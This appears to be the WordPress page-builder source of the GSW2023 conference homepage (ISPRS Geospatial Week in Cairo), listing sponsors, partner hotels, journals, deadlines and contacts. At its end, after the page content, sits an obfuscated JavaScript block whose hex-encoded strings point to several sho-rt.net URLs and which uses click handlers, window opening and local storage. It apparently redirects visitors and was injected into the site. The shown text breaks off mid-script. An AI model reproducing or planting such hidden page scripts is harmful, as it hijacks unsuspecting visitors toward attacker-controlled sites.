wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else 